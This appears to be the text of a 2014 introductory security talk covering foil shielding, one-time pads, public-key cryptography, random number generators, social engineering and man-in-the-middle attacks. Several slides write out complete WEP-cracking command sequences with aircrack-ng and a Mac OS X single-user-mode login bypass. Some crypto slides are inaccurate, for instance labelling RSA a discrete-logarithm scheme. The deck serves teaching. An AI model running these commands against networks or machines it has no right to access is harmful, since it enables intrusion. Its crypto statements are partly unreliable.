ISC 10 October 2014 George Wong
Sn vs Al Tin was first replaced by aluminum starting in 1910. In the late 19th century and early 20th century, tin foil was in common use, and some people continue to refer to the new product by the name of the old one. It tends to give a slight tin taste which is a major reason it has largely been replaced by aluminium and other materials 2
Difference? Aluminum The shielding effectiveness of aluminum foil depends upon the type of incident field and the frequency f >100 MHz, E_atten > 80 db. Aluminum foil is very effective at attenuating lowfrequency magnetic fields. A thickness of ~10 sheets offers less than 1dB of shielding at 1 khz, ~ 8 db at 10 khz, ~25 db at 100 khz. 3
Difference? Aluminum Tin The shielding effectiveness of aluminum foil depends upon the type of incident field and the frequency f >100 MHz, E_atten > 80 db. Aluminum foil is very effective at attenuating lowfrequency magnetic fields. A thickness of ~10 sheets offers less than 1dB of shielding at 1 khz, ~ 8 db at 10 khz, ~25 db at 100 khz. 4
Don t Trust Anyone! or You have to trust someone. 5
PERFECT SECURITY What does it mean? 6
PERFECT SECURITY What does it mean? What does that mean? 7
PERFECT SECURITY What does it mean? What does that mean? Can we achieve it? 8
YES: One-Time Pad (OTP) Bit-wise XOR with randomly generated key. Key must be same length as message Key cannot be reused Not practical! 9
Computational Security Function of security parameter (key length) Security increases with time. In practice: No need to exchange keys Computationally easy to perform Computationally hard to break 10
Basics of Asymmetric Cryptography YOU External Party Create PRIV-PUB key pair, publish PUB key Get PUB key Encrypt message with PUB and send ciphertext Decrypt ciphertext with PRIV 11
Basis for Asymmetric Cryptography One-way functions must exist: Easy to compute, hard (impossible?) to invert Sample methodologies (Cyclic Groups) Discrete Logarithm Elliptic Curve 12
Cyclic Group Set of elements with element(s) that generate(s) the others Given an element, hard to find the exponent! 13
Discrete Logarithm (RSA) 14
Discrete Logarithm (RSA) Given n, e, and b, find a. Breaking this requires: Brute force Factoring n, a (very) large number (NP) 15
Elliptic Curve 16
Hardcore Attack Strategy Find security flaw Spoof Probe Brute-force Differential Cryptanalysis Exploit (Escalate Privileges) Drop Payload Housekeeping 17
Worst Danger of Cryptography Ceiling Tiles! 18
Random Numbers Linear Congruence Generator Mersenne Twister Dual Elliptic Curve Deterministic Random Bit Generator (Dual_EC_DRBG) NSA 19
In Practice Social Engineering Asking / looking over the shoulder Post-it notes Piggybacking / Tailgating Phishing Keyloggers Cracking (vs Hacking!) Known Exploits (e.g. Heartbleed) Metasploit Kali Linux (i.e. BackTrack 6) 20
Certificate Authority (CA) Phonebook, do you trust the distributor? How do you get the public key? VeriSign, Digi-Sign, et al. Limits liability to $100 21
MITM Man In The Middle You have to send your data at some point Ettercap, ARP Spoofing and Promiscuous mode Alice Bob Eve 22
Cracked Files If a computer can run a file, you can read it and you can modify it! Assembly list of instructions Code injection Validation has to happen somewhere 23
Cracked Files so rewrite the code to skip validation! 24
WEP (Wired Equivalent Privacy) IV attack $ airmon-ng stop wlan0 $ ifconfig wlan0 down $ macchanger mac 00:11:22:33:44:55 wlan0 $ airmon-ng start wlan $ airodump-ng wlan0 $ airodump-ng c 1 w myfile bssid 00:16:B6:C4:66:46 wlan0 $ aireplay-ng -1 0 a 00:16:B6:B4:66:46 h 00:11:22:33:44:55 e PeteNetLive wlan0 $ aireplay-ng -3 b 00:16:B6:B4:66:46 h 00:11:22:33:44:55 wlan0 $ aircrack-ng b 00:16:B6:B4:66:46 myfile-01.cap 25
WEP (Wired Equivalent Privacy) $ airmon-ng stop wlan0 $ ifconfig wlan0 down $ macchanger mac 00:11:22:33:44:55 wlan0 $ airmon-ng start wlan $ airodump-ng wlan0 $ airodump-ng c 1 w myfile bssid 01:3E:04:C1:E0:92 wlan0 $ aireplay-ng -1 0 a 01:3E:04:C1:E0:92 h 00:11:22:33:44:55 e Karabraxos wlan0 $ aireplay-ng -3 b 01:3E:04:C1:E0:92 h 00:11:22:33:44:55 wlan0 26
WEP (Wired Equivalent Privacy) $ aircrack-ng b 01:3E:04:C1:E0:92 myfile-01.cap 27
WEP (Wired Equivalent Privacy) $ airmon-ng stop wlan0 $ ifconfig wlan0 down $ macchanger mac 00:11:22:33:44:55 wlan0 $ airmon-ng start wlan $ airodump-ng wlan0 $ airodump-ng c 1 w myfile bssid 00:16:B6:C4:66:46 wlan0 $ aireplay-ng -1 0 a 01:3E:04:C1:E0:92 h 00:11:22:33:44:55 e Karabraxos wlan0 $ aireplay-ng -3 b 01:3E:04:C1:E0:92 h 00:11:22:33:44:55 wlan0 $ aircrack-ng b 01:3E:04:C1:E0:92 myfile-01.cap 28
Windows OphCrack, Cain & Abel, Kon-Boot 29
Single User mode Notoriously easy to break into Mac OSX Tools: S Headphones $ /sbin/mount wu / $ rm /var/db/.applesetupdone 30
How to avoid the above: Make yourself a bad target Use encryption Update your system Don t publicize the worth of your information 31
The rules about keeping your information safe: 1. Your information is not safe. 2. Don t assume you can keep your information safe. 3. If someone tells you your information is safe, see Rule 1. It applies twice now. THANK YOU! 32
Resources http://en.wikipedia.org/wiki/tin_foil http://www.illuminatiagenda.com/wp-content/uploads/2014/07/eird-al-yankovic-tinfoil-hat.png http://dilbert.com/dyn/str_strip/000000000/00000000/0000000/000000/00000/2000/ 300/2318/2318.strip.gif http://xkcd.com/1323/ http://a.fsdn.com/con/app/proj/ophcrack/screenshots/170373.jpg http://www.chambersburgfire.com/manager/articlefiles/206-hq%20tile%2005-04%20enlarged.jpg http://en.wikipedia.org/wiki/elliptic_curve#mediaviewer/file:ecclines.svg http://www.smashcompany.com/wp-content/uploads/2014/04/screen-shot-2014-04- 06-at-9.12.38-PM.png &c. 33